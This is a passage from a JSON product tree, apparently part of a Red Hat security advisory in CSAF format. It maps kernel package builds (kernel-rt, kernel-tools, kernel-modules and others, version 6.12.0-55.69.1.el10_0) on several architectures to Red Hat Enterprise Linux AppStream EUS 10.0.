"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"product_id": "AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "AppStream-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
